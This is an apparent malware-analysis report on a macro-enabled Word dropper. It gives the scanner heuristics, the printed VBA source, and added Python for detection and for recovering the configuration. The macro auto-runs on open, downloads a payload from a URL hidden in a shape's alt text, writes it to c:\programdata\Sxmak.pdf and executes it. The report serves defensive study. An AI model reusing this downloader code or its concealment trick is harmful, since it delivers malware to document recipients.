Verdict: MALICIOUS
Risk score: 170
Heuristics: 6
- ClamAV: Doc.Dropper.Generic-9823827-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Generic-9823827-0.
- VBA project inside OOXML (medium, OOXML_VBA; 3 related findings). Document contains a VBA project: VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set rNlab = CreateObject("WinHttp.WinHttpRequest.5.1")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the heuristic's detail line.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
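The pairing rule described in the OLE_VBA_PCODE_AUTOEXEC_EXEC entry above, written out as a standalone check. This is an added example, not the analyzer's own implementation: it runs over the raw bytes of a module or p-code stream, tries both ASCII and UTF-16LE spellings of each token, and fires only when both token classes are present. The sample streams are constructed here; the first is modelled on the two matched lines quoted above.

```python
"""Pairing logic of the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, as an added
illustration (not the analyzer's own code). Works on raw stream bytes so it
applies whether decoded source or only the compiled p-code stream is available."""
import re

# Token lists quoted from the heuristic description.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open",
                   "Workbook_Open", "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream, tokens):
    """Return the tokens present in `stream` (bytes), in list order.

    Identifiers in a module stream may be ASCII or UTF-16LE depending on the
    stream type, so both encodings are tried; matching is case-insensitive
    because VBA identifiers are."""
    found = []
    for tok in tokens:
        for enc in ("ascii", "utf-16-le"):
            if re.search(re.escape(tok.encode(enc)), stream, re.IGNORECASE):
                found.append(tok)
                break
    return found


def pcode_autoexec_exec(stream):
    """Fire only when an auto-exec entry point AND an execution token co-occur."""
    autoexec = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"fires": bool(autoexec and execs),
            "autoexec": autoexec, "exec": execs}


# Constructed sample streams (not carved from the sample): one pairing both token
# classes, two carrying only one class, and one with UTF-16LE identifiers.
SAMPLE_BOTH = (b'Sub AutoOpen()\r\n'
               b'Set rNlab = CreateObject("WinHttp.WinHttpRequest.5.1")\r\n'
               b'End Sub\r\n')
SAMPLE_AUTO_ONLY = b'Sub AutoOpen()\r\nMsgBox "hello"\r\nEnd Sub\r\n'
SAMPLE_EXEC_ONLY = b'Sub Helper()\r\nShell "calc.exe"\r\nEnd Sub\r\n'
SAMPLE_UTF16 = (b"\x00\x01" + "Document_Open".encode("utf-16-le")
                + b"\x00\x00" + "ADODB.Stream".encode("utf-16-le"))

if __name__ == "__main__":
    for name, s in [("both", SAMPLE_BOTH), ("auto_only", SAMPLE_AUTO_ONLY),
                    ("exec_only", SAMPLE_EXEC_ONLY), ("utf16", SAMPLE_UTF16)]:
        print(name, pcode_autoexec_exec(s))
```

For a real document, feed it the bytes of each module stream carved from vbaProject.bin (olevba or olefile can enumerate them). Substring matching means `Shell` also hits `WScript.Shell` and `PowerShell`; that breadth is intended, and it is exactly why the heuristic requires the pairing with an auto-exec entry point instead of firing on a single token.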
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in document text (OOXML body / shared strings). They are the standard Office Open XML namespace URIs declared in the document markup (schemas.microsoft.com, schemas.openxmlformats.org) and are not network indicators. The macro's real download URL is not among them: the script below reads it at run time from the first shape's AlternativeText rather than storing it as a literal.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10503 bytes | baf6e02eb0e346de2a89b63637e4ff9acfb9ccb72a272d3421c8ec9f9dcd6395 |
Script preview (first 1,000 lines of the extracted script). Execution chain visible in the decoded source, once the filler comment lines are ignored: AutoOpen creates an fmXAO object and calls QjAMi, which issues a WinHttp.WinHttpRequest.5.1 GET to the URL returned by RkSWC(1). RkSWC reads ActiveDocument.shapes(1).AlternativeText, splits it on "kristi" and returns the requested field, so the download URL, the COM ProgID prefix and the command prefix are stored in the document's first shape, not in the macro. The response body is passed through StrConv(..., vbUnicode) and written with Print #1 to c:\programdata\Sxmak.pdf (the default argument of FefYh). YWoBy then calls CreateObject("" + RkSWC(2) + "ll").exec(RkSWC(0) + "r32 c:\programdata\Sxmak.pdf"): the dropped file is launched through a COM object whose ProgID ends in "ll" with a command whose first token ends in "r32". The complete values cannot be recovered from this preview alone; they require the shape's alternative text from word/document.xml.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FEfrY"
Sub FefYh(igPTI, Optional ByVal srqCN As String = "c:\programdata\Sxmak.pdf")
' Postmarked examiner plover racists madcap expatriated blurs
' Hoarseness hairstyles solid beans funerals
' Genuinely disingenuous experienced obliviousness ecumenism flashbulb
' Studentship ennui
' Misapprehension trisector smooth silkier
' Facing
' Ambassadors procreate
' Edgeless drape eurasian algebraic
' Dieter haywain
' Tumbler attics
' Flickering prefixes sheeted fishers
' Ungrounded unclenched
' Noxiousness opting
' Reshaped sickens
' Castings unequivocally impetuous
' Enjoyer
' Amenability adhesiveness discursively megajoules
' Menace expire thawed
' Airlock
' Dockside paralysing lymphoma comport
' Direness reimplementing
' Replacing unjustly plainness torturous reintroduction
' Nightmarish punctuates bartering
' Adroit
' Tidbit tufted
' Breathingspace cocks gapingly hypothesised
' Ilmenite unbeaten
' Earths relaid
' Dossiers thirteen propounded xerography videotapes
' Meaningfully altercations battlegrounds
' Exterminator quicker hares mulberry recalls
' Oldtimers pleasurably
' Eons vertical encapsulate
' Overvalued fenders pimpernel
' Peacetime
' Penitent wooded striver lapdogs trite
' Macrophage syrupy
' Trilingual hydrostatic potters
nlpkE = srqCN
Open nlpkE For Output As #1
' Tab range insanity oblongs
' Seekers annotates tits gaseous
' Rippling apprising botany
' Purifier cremated inactivating purl
' Privatisation refiners improvisation molluscan pawnshop
' Secreting facing accusers
' Need conditioning mellower gratefully wifely
' Accustoming interviewee
Print #1, igPTI
' Photovoltaic oratorical eugenic plain
' Earthly redefinition decoration
' Scooters lancelot
' Dispersion
' Textiles trappable posh wrangling farmed middleman
Close #1
End Sub
' Seizure superintendence
' Cowled obstreperous shall expedient bistro
' Conveyed contributions partisanship absurd punchcard
' Altarpieces tiro glamorous corroborating incursions
' Dithered acrostic receivership
Sub AutoOpen()
' Logical dove hates
' Rankings melanoma strong subdivides
' Anaesthetise briefest
' Comber sideshow monadic ablate oink diametrically artichokes
' Khan
' Haggling helpmates jailing consisted jamaican
' Doormen amnesic hypothesising
' Tannoy
' Assimilable pickup culls
' Briefest lilongwe curated
' Cleaved ergot
' Wellintentioned perioperative fulling profoundest squelchy
' Incapacitation vamp eutectic perturb
' Chemiluminescence forfeit
' Masterpiece beatitude infestation
' Jousting peppercorn
' Creepers understated
' Refining
' Experimented shrinkable lounged
' Vole cannibal
' Embarking fuselage mavericks
' Chartered screechier prejudicial instrumented
' Prunings environ lulled
' Flips simplex
' Frolicking
' Obligation shelf splashes
' Disrupting
Dim TRzYA As New fmXAO
' Mystically protein texture manipulative
' Crossed cookery flickering smelt
' Worshippers panics unlocking
' Unmentionables appal quiet weaknesses burn casebook
' Protectiveness
' Flours established covenant
' Cavernous markers titration
igPTI = TRzYA.QjAMi()
' Addressed undeterred
' Penguins sprig reinvestigation reshuffle sanctum reweighed
' Graphology designers
' Voluminous coachload
' Incinerator thousandths spurns spectrophotometer postgraduates opus
FefYh HLjlc(igPTI)
' Blushes ideologist notepad bandaging legendary encapsulate
' Premeditate atombomb ego predicaments
' Breezing
' Zappy inquired terrapins
' Keying toothed grumbled nectars matriarchal crude
' Lows reposed
' Maximality immolate became internees
' Avens orator emeritus maintenance
' Unfavourable
' Gallivanted maputo
' Unloose
YWoBy RkSWC(0) + "r32 c:\programdata\Sxmak.pdf", ""
End Sub
Function yqmYf(DrRXH, KlUup)
' Immortally wherever bland nephews
' Overshoot multiplexor ate loganberries demolition
' Conversational flukey lexicon wittingly
' Jemmy bullfinch subatomic
' Thermostatic
' Sensationalistic sampler needle fricative
yqmYf = Split(DrRXH, KlUup)
End Function
Attribute VB_Name = "fwimO"
' Dynamic introducing
' Ostler geriatrics
' Greengrocer forecasting monomania unfunded
' Axeheads
' Preclude headmistresses underfloor perpetuation mallard
Function HLjlc(NvRfD)
' Earwig irrigating pantomime longstanding cuddles tonsillitis
' Intermixing fretless disingenuously
' Contortionist swallowed racetrack rampart
' Presenter
HLjlc = StrConv(NvRfD, vbUnicode)
' Abseil reloading
' Bottomless dessert meiotic cancer brittleness
' Wreathes
' Transcendentally peripheral embittered
End Function
' Invariably dialectically walk verbiage
' Maseru coopers inflicts furbished
' Interruptibility
' Egoists obscenely malaria
' Engravers skinny
' Jester deprecated quiches mossy
Function rfBZQ()
' Sourced churchyards tiptoes
' Roofing superlative roll
' Whining hydrodynamic programs squeal
' Imprecisely burliest red
' Forging calypso line acquits
' Ripening reflexive trumpery creatable resonantly winker
' Commercialised beheld transatlantic bestowing juniper cupful
' Civility wails resemblances infeasibility
' Outweighs typical procreation
' Wooded brochures
' Dazzled archaeologists traditional straitjacket iguanas
' Conveyancing damningly
rfBZQ = ActiveDocument.shapes(1).AlternativeText
End Function
' Semaphoring supply beatnik
' Auditorium
' Aflame embarrassedly derelict decant disillusioning
' Hijackings hearsay diggers
Function RkSWC(eZuzY)
' Raftsman trinity cheats stultified stringer
' Lode brabble
' Epilepsy resea airstrip
' Bestseller scintillations
' Slackers deductible gloves
' Courtrooms
' Redouble logger premiership
' Jinks
' Antennae pacify stumped inauspiciously residuary
YYRTc = rfBZQ()
TKEfH = yqmYf(YYRTc, "kristi")
lIlXs = TKEfH(eZuzY)
RkSWC = lIlXs
End Function
Attribute VB_Name = "fmXAO"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Hotel
' Conceivability premises cassocks talked
' Yes centipedes culled jackinthebox
' Judiciaries embarks frigates
Function QjAMi()
' Coefficients defenders essences
' Pretence
' Couch expunged exasperated acquittals mistress ignorant
' Engorge uniting unexplained
' Closing
Dim rNlab As Object
' Decreed craftier accosting interbred rekindle flaming
' Vino identified
' Trickled stupefaction infraction claws
' Rinsing
' Levelled axehead
' Contingents junker twiggy sirs
Set rNlab = CreateObject("WinHttp.WinHttpRequest.5.1")
' Tailor integrands decried mischievous concentrator gearstick
' Malignity outbound yearly
' Derives confrontations
' Magnetise logicians envelop cosmologies
' Stations revenged
' Cuckolded unnerved impractically
' Rematching ploughing bid soggiest
' Ploys hearttoheart
' Bodkin gates arch
' Neolithic windfalls pigtailed devotedness straggler beneficial
' Staunch
' Inexpressible cubism jailer
' Turreted interstices
' Diverge doctorate hardening blanching wider
' Bravely midriff cormorants strived recures
' Generates rasters nested
' Combusts antic
' Tracksuits sodomite consul apprised
' Bibs dissembling presentation adapting initiates
' Outlook workdays parroting brawnier
' Bluemoon
' Listening destroys backstage
' Brackets writable hoaxed loaders
' Crasher disarrayed
' Demagogues
' Missed north sojourners knapsack stomping following
' Bullies
' Toadies liberated subtracts catguts neuroscience
' Envelop tangents civilly
' Nitric sweats subjugated result
xozjD = RkSWC(1)
' Recklessly crossword collaboration
' Sedge cannot peevish tracker
' Aviaries correct
' Thins
' Landlocked favoured premising
' Piteously obscenity pinheads adjourns sixths legatees classifying
' Uncle favouring vows
' Deceitfulness rusts clowns traditional waveband
rNlab.Open "GET", xozjD, False
' Waggishly gaging grids pastime growler
' Columbus stalin underpins housekeeping overripe tenfold salons wallpapering
' Outreach prep bootees
' Stylisation sunblock drownings
' Bureau expansionism despisal sighted transactions
' Gunwale hypertonic races
' Germicidal silty earthenware chattels biliary
' Parsings stingily undo vehemently tungsten vamp
rNlab.Send
' Pegasus banter psalmody
' Brochures
' Extramural everchanging colourless
' Hexagrams unaroused colonials
' Trumpeters unhealthy grasper suddenness
' Courted pleat disregard teed pour
QjAMi = rNlab.responsebody
End Function
Attribute VB_Name = "SImsQ"
Sub YWoBy(gJbLL, JmjQm)
' Folklorist ashcans
' Deriders expression
' Misdemeanours amended
' Drafter bowel
' Resting microbe gaudy tensions
' Coffin impedance ascribes polygon
' Interacted pinked
' Compiled majestically sicker
' Bate numerals
Set TBeDG = CreateObject(JmjQm + RkSWC(2) + "ll").exec(gJbLL)
' Nympholepsy kilobits spilt
' Interests gaggle asinine recirculate
' Laird loams immersion concretely
' Cavalrymen drawls
' Displayable cementing enraptured
' Cinder sorrows wildly
' Antigen starches widen reaffirmed occasional
' Urgings diagnoses
' Graphics diametric
' Husky epitomised merriest synthesised insolent
' Penknife meringues slink saccharides plentifully
' Categories organisable slackened reassuringly
' Rigmarole skied
' Sunsets ale ashbins
' Delible
' Afro prolongation introspectively wreathe hooks
' Obligatory emersion slower logger collaborationist contortions
' Bonnet impatient tribe scribble
' Axis
' Stead anticipates along
' Trophy seating champ axiomatically blubbering
' Mystically cleanse convertible
' Boorishly minuted giraffes dressmaker
' Covenanters ineligible
' Had
' Yearningly gleaming
' Voter discretionary plait
' Psychotic rotund womanise boiling
' Asocial eggs crotch
' Soot repossession licked
' Redundantly reconversion
' Bossing fishhooks gorging compatible passageways
' Dishonestly signposted face
' Petrol foredeck gleefully insipid accuse unremarkable jetted
' Linesman exterminators coupon spindly
' Pact
' Prussian fermenting
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 40960 bytes | d280366ac7d8f586661c95cbe37d5ea1fdb94946a7b5395c3f8a099f74bb6bc6 |
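The macro above never contains its own URL, COM ProgID or command line; RkSWC derives all three from ActiveDocument.shapes(1).AlternativeText split on "kristi", and that alternative text is not part of macros.bas or of this report. The following is an added example (not the analyzer's or the sample author's code) showing how an analyst pulls that string out of the OOXML package and reassembles the three values exactly the way QjAMi, YWoBy and AutoOpen consume them. Assumptions: Word stores a floating shape's alternative text in the `descr` attribute of `<wp:docPr>` beneath `<wp:anchor>` in word/document.xml, and Shapes(1) is the first such anchor in document order. The document.xml and the SLOT0 / SLOT2 / URL values are constructed placeholders, not recovered indicators.

```python
"""Added example (not the analyzer's or the sample author's code): extract the
configuration string the macro reads from ActiveDocument.shapes(1).AlternativeText
and split it the way RkSWC does. Assumption: Word keeps a floating shape's
alternative text in the descr attribute of <wp:docPr> under <wp:anchor> in
word/document.xml, and Shapes(1) is the first such anchor in document order."""
import xml.etree.ElementTree as ET
import zipfile

WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
DELIM = "kristi"                          # yqmYf(YYRTc, "kristi") in the macro
DROP_PATH = r"c:\programdata\Sxmak.pdf"   # FefYh default argument / AutoOpen

# Constructed stand-in for word/document.xml. The real sample's alt text is not
# shown in the report; SLOT0, SLOT2 and the URL are placeholders, not indicators.
SAMPLE_DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:wp="' + WP_NS + '">'
    '<w:body><w:p><w:r><w:drawing><wp:anchor>'
    '<wp:docPr id="1" name="Shape 1" '
    'descr="SLOT0kristihttp://example.invalid/stage.binkristiSLOT2"/>'
    '</wp:anchor></w:drawing></w:r></w:p></w:body></w:document>'
)


def floating_shape_alt_texts(document_xml):
    """AlternativeText of each floating shape, in document order."""
    root = ET.fromstring(document_xml)
    return [doc_pr.get("descr", "")
            for anchor in root.iter("{%s}anchor" % WP_NS)
            for doc_pr in anchor.iter("{%s}docPr" % WP_NS)]


def alt_texts_from_docx(path):
    """Same, straight from a .docx/.docm on disk (a ZIP container)."""
    with zipfile.ZipFile(path) as z:
        return floating_shape_alt_texts(z.read("word/document.xml").decode("utf-8"))


def reconstruct_chain(alt_text):
    """Rebuild the three values the macro derives from the alt text.

    RkSWC(n) is Split(alt_text, "kristi")(n); the macro uses:
      RkSWC(1)                               -> rNlab.Open "GET", ..., False
      "" + RkSWC(2) + "ll"                   -> CreateObject(...)
      RkSWC(0) + "r32 c:\\programdata\\Sxmak.pdf" -> .exec(...)
    """
    parts = alt_text.split(DELIM)
    if len(parts) < 3:
        raise ValueError("alt text has %d field(s); the macro indexes 0..2" % len(parts))
    return {
        "download_url": parts[1],
        "drop_path": DROP_PATH,
        "progid": "" + parts[2] + "ll",
        "command": parts[0] + "r32 " + DROP_PATH,
    }


if __name__ == "__main__":
    alt = floating_shape_alt_texts(SAMPLE_DOCUMENT_XML)[0]
    for key, value in reconstruct_chain(alt).items():
        print("%-13s %s" % (key, value))
```

Run `alt_texts_from_docx` against the actual sample and pass the first string to `reconstruct_chain` to obtain the live URL, the ProgID and the full command; those are the indicators worth blocking, and none of them appears in the URL list above.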